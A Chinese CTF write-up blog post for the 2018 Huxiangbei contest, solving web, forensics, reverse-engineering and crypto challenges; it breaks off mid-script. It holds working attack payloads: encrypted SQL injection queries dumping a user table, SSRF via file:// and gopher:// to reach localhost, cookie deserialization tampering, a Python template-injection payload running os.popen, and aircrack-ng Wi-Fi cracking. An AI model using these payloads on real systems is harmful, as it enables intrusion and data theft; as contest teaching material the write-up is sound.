<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="湖湘杯2018-WP"><meta name="keywords" content="SSTI,反序列化,SQL注入,SSRF"><meta name="author" content="V0WKeep3r,v0wldl@163.com"><meta name="copyright" content="V0WKeep3r"><title>湖湘杯2018-WP | V0W's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="V0W's Blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Welcome"><span class="toc-text">Welcome</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CodeCheck"><span class="toc-text">CodeCheck</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Readflag"><span class="toc-text">Readflag</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MyNote"><span class="toc-text">MyNote</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XmeO"><span class="toc-text">XmeO</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Misc"><span class="toc-text">Misc</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Disk"><span class="toc-text">Disk</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flow"><span class="toc-text">flow</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Hidden-Write"><span class="toc-text">Hidden Write</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RE"><span class="toc-text">RE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Replace"><span class="toc-text">Replace</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Crypto"><span class="toc-text">Crypto</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Common-Crypto"><span class="toc-text">Common Crypto</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%90%8E%E8%AE%B0"><span class="toc-text">后记</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/Kaneki.jpg"></div><div class="author-info__name text-center">V0WKeep3r</div><div class="author-info__description text-center">Stay Hungry, Stay Foolish.</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/qingchenldl">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">56</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">30</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">11</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://zhuxianjin.github.io/">J0k3r</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0desta.com/">p0desta</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://daolgts.github.io/">dlgts</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://iwenhu.cn/">mengchen</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://p0sec.net/">p0</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://asa9ao.xyz/">唯湖</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://seaii-blog.com/">seaii</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://wzt.ac.cn/">WCatalpa.T</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://syf.ac.cn/">7N1ght</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://www.nicefish.top/posts/">nicefish</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://flag0.com/">GetFlag</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/index.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">V0W's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a><a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a><a class="site-page" href="/about">关于我</a></span></div><div id="post-info"><div id="post-title">湖湘杯2018-WP</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2018-11-18</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/CTF/">CTF</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">2.6k</span><span class="post-meta__separator">|</span><span>阅读时长: 12 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>首先，这次湖湘杯的web出的真的差，多种非预期，多种环境问题，题目多次上线下线，还没有实时的分数榜？？？因为这次逆向和pwn不强，我们应该是无缘决赛了==、有点难受。。。</p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="Welcome"><a href="#Welcome" class="headerlink" title="Welcome"></a>Welcome</h2><p>签到题，进入公众号回复hxb2018即得。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image002.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: hxb2018&#123;W3lc0me_T0_Hxb2o18&#125;</span><br></pre></td></tr></table></figure>



<h2 id="CodeCheck"><a href="#CodeCheck" class="headerlink" title="CodeCheck"></a>CodeCheck</h2><p>首先，进入维护通知，发现这个</p>
<p>/news/list.php</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image004.jpg"></p>
<p>进入/news</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image006.jpg"></p>
<p>发现zip源码泄露，下载源码：</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image008.jpg"></p>
<p>逻辑很简单，就是把加密的id取出来，然后解密，之后SQL查询，很明显的SQL注入，然后只是加了个加密。</p>
<p>根据解密函数，写个加密函数，之后把SQL语句加密提交就行了。</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// header(&#x27;content-type:text/html;charset=utf-8&#x27;);</span></span><br><span class="line"><span class="comment">// require_once &#x27;../config.php&#x27;;</span></span><br><span class="line"><span class="comment">//解密过程</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">decode</span>(<span class="params">$data</span>)</span>&#123;</span><br><span class="line">	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,<span class="string">&#x27;&#x27;</span>,MCRYPT_MODE_CBC,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">	mcrypt_generic_init($td,<span class="string">&#x27;ydhaqPQnexoaDuW3&#x27;</span>,<span class="string">&#x27;2018201920202021&#x27;</span>);</span><br><span class="line">	$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));</span><br><span class="line">	mcrypt_generic_deinit($td);</span><br><span class="line">	mcrypt_module_close($td);</span><br><span class="line">	<span class="keyword">if</span>(substr(trim($data),<span class="number">-7</span>)!==<span class="string">&#x27;hxb2018&#x27;</span>)&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;script&gt;window.location.href=&quot;/index.php&quot;;&lt;/script&gt;&#x27;</span>;</span><br><span class="line">	&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">		<span class="keyword">return</span> substr(trim($data),<span class="number">0</span>,strlen(trim($data))<span class="number">-7</span>);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">encode</span>(<span class="params">$data</span>)</span>&#123;</span><br><span class="line">	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,<span class="string">&#x27;&#x27;</span>,MCRYPT_MODE_CBC,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">	mcrypt_generic_init($td,<span class="string">&#x27;ydhaqPQnexoaDuW3&#x27;</span>,<span class="string">&#x27;2018201920202021&#x27;</span>);</span><br><span class="line">	$data = $data.<span class="string">&#x27;hxb2018&#x27;</span>;</span><br><span class="line">	$data = mcrypt_generic($td,$data);</span><br><span class="line">	mcrypt_generic_deinit($td);</span><br><span class="line">	mcrypt_module_close($td);</span><br><span class="line">	$data = base64_encode(base64_encode($data));</span><br><span class="line">	<span class="keyword">return</span> $data;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// echo encode(&#x27;0 union select 1,2,3,4#&#x27;).&quot;\n&quot;;</span></span><br><span class="line"><span class="comment">// echo encode(&#x27;0 union select 1,database(),version(),4#&#x27;).&quot;\n&quot;;</span></span><br><span class="line"><span class="comment">// K3hId1N2UVpNcjFENkFja0FtMHdrN2JhOUx4ZE82R1VhU0k0UXRITlRaS2w0dnRBV2Yva3VnWFdXa21TNWhOaA==</span></span><br><span class="line"><span class="comment"># mozhe_discuz_stormgroup</span></span><br><span class="line"><span class="comment"># 5.1.73</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// echo encode(&#x27;0 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()#&#x27;).&quot;\n&quot;;</span></span><br><span class="line"><span class="comment">// K3hId1N2UVpNcjFENkFja0FtMHdrM1NpZEZ4Z2o0TktKSElob2Z3YithcmtBYStsR0VLVUVPdFZPeHE4THZLcnYxMEpjM3FjZ0QxMHpTSHBTSExobG1IeHArc3NsMzlDaDM1TlpsTUdVb2NEMnpvNDRpcUMrVzl6ZFR2L1lobG1Yd083WnJocC80ZURGNnJaVlh4c1RyUzNKQXZVdFdRODdKQ01iQmEzYnJBPQ==</span></span><br><span class="line"><span class="comment">// notice,notice2,stormgroup_member</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// echo encode(&#x27;0 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database() and table_name=&quot;stormgroup_member&quot;#&#x27;).&quot;\n&quot;;</span></span><br><span class="line"><span class="comment">// K3hId1N2UVpNcjFENkFja0FtMHdrM1NpZEZ4Z2o0TktKSElob2Z3YithckVCelF1dUJ6S2doQ3pOR2pxOGZBSDIzOWdxYlYwayt6Nm1oRU1PZUZscWVMU3BQMGgzWTNabmdHMmQ2ZXBXWVUrOVltWmZWQWtVNWM2dFVjQm1jWEM5YmlxWGF6R0N3WE1JWG52WXVONHFMRE1iZ0kyM3BtN2Y5TktKUUZoMm9KV2RmRGV5N3RreDlFV0t0QTFjRlpUOFdiRGQ0Q2FVa3h4b2JvNUc1U0FSQT09</span></span><br><span class="line"><span class="comment">// id,name,password,status</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// echo encode(&#x27;0 union select 1,name,password,4 from stormgroup_member#&#x27;).&quot;\n&quot;;</span></span><br><span class="line"><span class="comment">// mozhe1</span></span><br><span class="line"><span class="comment">// 356f589a7df439f6f744ff19bb8092c0</span></span><br><span class="line"><span class="comment">// dsan13</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// echo encode(&#x27;0 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database() and table_name=&quot;notice2&quot;#&#x27;).&quot;\n&quot;;</span></span><br><span class="line"><span class="comment">// id,title</span></span><br><span class="line"><span class="keyword">echo</span> encode(<span class="string">&#x27;0 union select 1,group_concat(id),group_concat(title),4 from notice2#&#x27;</span>).<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="comment">// K3hId1N2UVpNcjFENkFja0FtMHdrMlVPU1lyV2NyNUc5Q240TXB0UldaaEtMakFxSWwxeTZEWmdrQU1rRERVMDhldVNZa1ZRV1lZbGdDZFUySFVJR05ZSmNjRWlBRTdwb2dNUFdhVERjN3M9</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image010.jpg"></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image012.jpg"></p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image014.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: hxb2018&#123;7a2709e852f6ee9e6ead206d055cd38&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Readflag"><a href="#Readflag" class="headerlink" title="Readflag"></a>Readflag</h2><p>提示非常明显SSRF，首先SSRF+file协议读文件，我想知道web目录，于是读apache的配置文件：</p>
<p><a target="_blank" rel="noopener" href="http://47.107.238.167/?url=file:///etc/apache2/sites-available/000-default.conf">http://47.107.238.167/?url=file:///etc/apache2/sites-available/000-default.conf</a></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"># The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request&#39;s Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. #ServerName www.example.com ServerAdmin webmaster@localhost DocumentRoot &#x2F;var&#x2F;www&#x2F;html&#x2F;ssrf&#x2F;web.php # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog $&#123;APACHE_LOG_DIR&#125;&#x2F;error.log CustomLog $&#123;APACHE_LOG_DIR&#125;&#x2F;access.log combined # For most configuration files from conf-available&#x2F;, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with &quot;a2disconf&quot;. #Include conf-available&#x2F;serve-cgi-bin.conf # vim: syntax&#x3D;apache ts&#x3D;4 sw&#x3D;4 sts&#x3D;4 sr noet</span><br></pre></td></tr></table></figure>



<p>得到web目录</p>
<p><code>/var/www/html/ssrf/web.php</code></p>
<p>拿到源码：</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">&#x27;url&#x27;</span>]))&#123;</span><br><span class="line">  <span class="keyword">echo</span> <span class="string">&quot;ssrf me with parameter &#x27;url&#x27;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">$ch = curl_init(); </span><br><span class="line">curl_setopt($ch, CURLOPT_URL, $_GET[<span class="string">&#x27;url&#x27;</span>]); </span><br><span class="line"><span class="comment">//echo $_GET[&#x27;url&#x27;];</span></span><br><span class="line">curl_setopt($ch, CURLOPT_RETURNTRANSFER, <span class="number">1</span>);</span><br><span class="line"><span class="comment">#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);</span></span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>); </span><br><span class="line"><span class="keyword">echo</span> curl_exec($ch); </span><br><span class="line">curl_close($ch); </span><br><span class="line"></span><br><span class="line"><span class="comment">//var_dump($_POST);</span></span><br><span class="line">$ip = $_SERVER[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">&#x27;user&#x27;</span>]))&#123;</span><br><span class="line">  <span class="keyword">if</span>($_POST[<span class="string">&#x27;user&#x27;</span>]==<span class="string">&quot;admin&quot;</span> &amp;&amp; $ip==<span class="string">&quot;127.0.0.1&quot;</span>)&#123;</span><br><span class="line">    system(<span class="string">&quot;/var/www/html/ssrf/readflag&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>分析逻辑，不难发现想要绕过这个判断执行程序，需要一个服务器本地代理，利用gopher协议可以做到：</p>
<p>paylaod：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#x2F;?url&#x3D;gopher%3A%2F%2F127.0.0.1%3A80%2F_POST+%2F+HTTP%2F1.1%250d%250aHost%3A+127.0.0.1%250d%250aUser-Agent%3A+curl%2F7.43.0%250d%250aAccept%3A+%2A%2F%2A%250d%250aContent-Length%3A+10%250d%250aContent-Type%3A+application%2Fx-www-form-urlencoded%250d%250a%250d%250auser%3Dadmin</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image028.jpg"></p>
<p>事实上，本题存在非预期解，因为flag文件直接就在web目录下，所以可以直接通过file协议去读flag文件：</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image030.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: hxb2018&#123;0ef0c0d15f1a33b47af2a01669fbf124&#125;</span><br></pre></td></tr></table></figure>



<h2 id="MyNote"><a href="#MyNote" class="headerlink" title="MyNote"></a>MyNote</h2><p>/robots.txt容易发现源码泄露</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image032.jpg"></p>
<p>在/User.php中发现函数__destruct()</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image034.jpg"></p>
<p>可能存在反序列化，又发现上传文件后，会多一个Cookie—Picture。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image036.jpg"></p>
<p>base64解一下，容易出来</p>
<p><code>a:1:&#123;i:0;s:32:&quot;F2006061314554700166_400x400.jpg&quot;;&#125;</code></p>
<p>发现是原文件名的序列化。</p>
<p>将其改为想读取的文件：flag的序列化，BASE64加密得到</p>
<p>把原来的文件名改为flag.php</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image038.gif"></p>
<p>得到新的cookie，修改cookie得到flag</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image040.jpg"></p>
<p>base64解码得到flag。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image042.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: hxb2018&#123;445b40b69867325f6145eca1e77fc8e1&#125;</span><br></pre></td></tr></table></figure>



<h2 id="XmeO"><a href="#XmeO" class="headerlink" title="XmeO"></a>XmeO</h2><p>注册登录然后add的内容能进行模板注入</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&#123;&#123;&#39;&#39;.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen(&#39;ls&#39;).read()&#125;&#125; </span><br></pre></td></tr></table></figure>



<p>选项填否，然后点show得到回显</p>
<p>读auto.js</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line"> var url&#x3D;&quot;http:&#x2F;&#x2F;127.0.0.1:9990&#x2F;admin&quot;</span><br><span class="line"> setInterval(function()&#123;</span><br><span class="line"> var webPage &#x3D; require(&#39;webpage&#39;);</span><br><span class="line"> var page &#x3D; webPage.create();</span><br><span class="line"> ​</span><br><span class="line"> var setting&#x3D;&#123;</span><br><span class="line">   operation: &quot;GET&quot;,</span><br><span class="line">   encoding: &quot;utf8&quot;,</span><br><span class="line">   headers: &#123;</span><br><span class="line">​           &quot;Referer&quot;:url</span><br><span class="line">​         &#125;,</span><br><span class="line"> &#125;;</span><br><span class="line"> ​</span><br><span class="line"> page.addCookie(&#123;</span><br><span class="line">   &#39;name&#39;     : &#39;hint&#39;,</span><br><span class="line">   &#39;value&#39;   : &#39;Try to get admin\&#39;s page content&#39;,</span><br><span class="line">   &#39;domain&#39;   : &#39;127.0.0.1&#39;,</span><br><span class="line">   &#39;path&#39;     : &#39;&#x2F;admin&#x2F;&#39;,</span><br><span class="line">   &#39;httponly&#39; : false,</span><br><span class="line">   &#39;secure&#39;   : false,</span><br><span class="line">   &#39;expires&#39; : (new Date()).getTime() + (1000 * 60 * 60)</span><br><span class="line"> &#125;);</span><br><span class="line"> ​</span><br><span class="line"> page.addCookie(&#123;</span><br><span class="line">   &#39;name&#39;     : &#39;flag&#39;,</span><br><span class="line">   &#39;value&#39;   : &#39;hxb2018&#123;29ffadfd3c22c8928f544c0b576e100f&#125;&#39;,</span><br><span class="line">   &#39;domain&#39;   : &#39;127.0.0.1&#39;,</span><br><span class="line">   &#39;path&#39;     : &#39;&#x2F;admin&#x2F;mysecrecy_directory&#39;,</span><br><span class="line">   &#39;httponly&#39; : false,</span><br><span class="line">   &#39;secure&#39;   : false,</span><br><span class="line">   &#39;expires&#39; : (new Date()).getTime() + (1000 * 60 * 60)</span><br><span class="line"> &#125;);</span><br><span class="line"> page.addCookie(&#123;</span><br><span class="line">   &#39;name&#39;     : &#39;session&#39;,</span><br><span class="line">   &#39;value&#39;   : &#39;eyJjc3JmX3Rva2VuIjp7IiBiIjoiWlRZNE0yUXlNR1pqTkRJNU16RXpOalJqWkRNMk4yUmxZVGd4TXpFelpHTmpabVEwWVRSak1RPT0ifSwidXNlcm5hbWUiOiJhZG1pbiJ9.DoVbkw.ylHkvfjRjM42G1I0gkcTQz4Hi5U&#39;,</span><br><span class="line">   &#39;domain&#39;   : &#39;127.0.0.1&#39;,</span><br><span class="line">   &#39;path&#39;     : &#39;&#x2F;admin&#x2F;&#39;,</span><br><span class="line">   &#39;httponly&#39; : true,</span><br><span class="line">   &#39;secure&#39;   : false,</span><br><span class="line">   &#39;expires&#39; : (new Date()).getTime() + (1000 * 60 * 60)</span><br><span class="line"> &#125;);</span><br><span class="line"> ​</span><br><span class="line"> page.open(url,setting,function(status)&#123;</span><br><span class="line">   console.log(page.content);</span><br><span class="line">   setTimeout(function()&#123;&#125;,7000);</span><br><span class="line"> &#125;);</span><br><span class="line"> ​</span><br><span class="line"> &#125;,7000);</span><br><span class="line"></span><br><span class="line"> </span><br></pre></td></tr></table></figure>

<p>在page.addCookie中看到了flag。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: hxb2018&#123;29ffadfd3c22c8928f544c0b576e100f&#125;</span><br></pre></td></tr></table></figure>





<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="Disk"><a href="#Disk" class="headerlink" title="Disk"></a>Disk</h2><p>挂载vmdk文件，得到四个txt文件，NTFS交换数据流隐写，拼接得到的二进制</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image044.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">01100110 01101100 01100001 01100111 01111011 00110100 01000100 01010011 01011111 00110001 01101110 01011111 01000100 00110001 01110011 01101011 01111101 </span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: flag&#123;4DS_1n_D1sk&#125;</span><br></pre></td></tr></table></figure>



<h2 id="flow"><a href="#flow" class="headerlink" title="flow"></a>flow</h2><p>首先下载的是无线流量包，一般思路是解wifi密码，然后那这个做密钥来解流量报文。</p>
<p>利用kali的工具aircrack-ng，加上字典，容易破解得到密码password1</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image048.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">aircrack-ng ctf.pcap  -w 33889.txt</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image050.jpg"></p>
<p>之后利用这个密码来解流量数据包，命令：</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">airdecap-ng.exe ctf.pcap -e ctf -p password1</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image052.jpg"></p>
<p>之后wireshark分析得到的流量包：追踪一个http流，容易发现flag</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image054.jpg"></p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: flag&#123;H4lf_1s_3n0ugh&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Hidden-Write"><a href="#Hidden-Write" class="headerlink" title="Hidden Write"></a>Hidden Write</h2><p>搜索png的文件格式尾16进制49454E44AE</p>
<p>得到3个结果：</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image056.jpg"></p>
<p>说明有三张png图片，分别提取出来，之后在一张稍大点的png中，发现LSB隐写。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image058.jpg"></p>
<p>得到一半flag</p>
<p><code>hxb2018&#123;1e30f3b836d78d25c</code></p>
<p>双图或多图，容易想到盲水印攻击，于是利用脚本，发现成功</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image062.jpg"></p>
<p>得到另一半flag</p>
<p><code>20b4a&#125;</code></p>
<p>于是得到完整的flag</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">flag: hxb2018&#123;1e30f3b836d78d25c20b4a&#125;</span><br></pre></td></tr></table></figure>



<h1 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h1><h2 id="Replace"><a href="#Replace" class="headerlink" title="Replace"></a>Replace</h2><p>IDA打开程序后几乎没什么东西，查壳发现常见的upx壳。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image016.jpg"></p>
<p>直接用upx脱壳机脱掉，提示有重定向，而且不能运行，但是不影响静态调试。放到IDA里查看。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image018.jpg"></p>
<p>逻辑不复杂，只有一个加密函数,sub_401090。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image020.jpg"></p>
<p>发现byte_402151[]和byte_402150[]指的是同一个字符串。在hexView里提取出来，前面两位0x32和0x61也要加上（根据后面长度判断）。</p>
<p>而这个byte_4021A0数组，通过IDA的findcrypt插件可以发现这其实是AES加密中的S盒，为了方便直接从AES加密里把这个数组拿出来即可。</p>
<p><img src="https://raw.githubusercontent.com/qingchenldl/BlogImage/master/img/clip_image022.jpg"></p>
<p>最后按照处理过程编写脚本，基本就是照着逻辑照抄，爆破即可。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">box &#x3D; [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,</span><br><span class="line"></span><br><span class="line">                               0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0,</span><br><span class="line"></span><br><span class="line">                               0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15,</span><br><span class="line"></span><br><span class="line">                               0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75,</span><br><span class="line"></span><br><span class="line">                               0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84,</span><br><span class="line"></span><br><span class="line">                               0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf,</span><br><span class="line"></span><br><span class="line">                               0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8,</span><br><span class="line"></span><br><span class="line">                               0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,</span><br><span class="line"></span><br><span class="line">                               0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 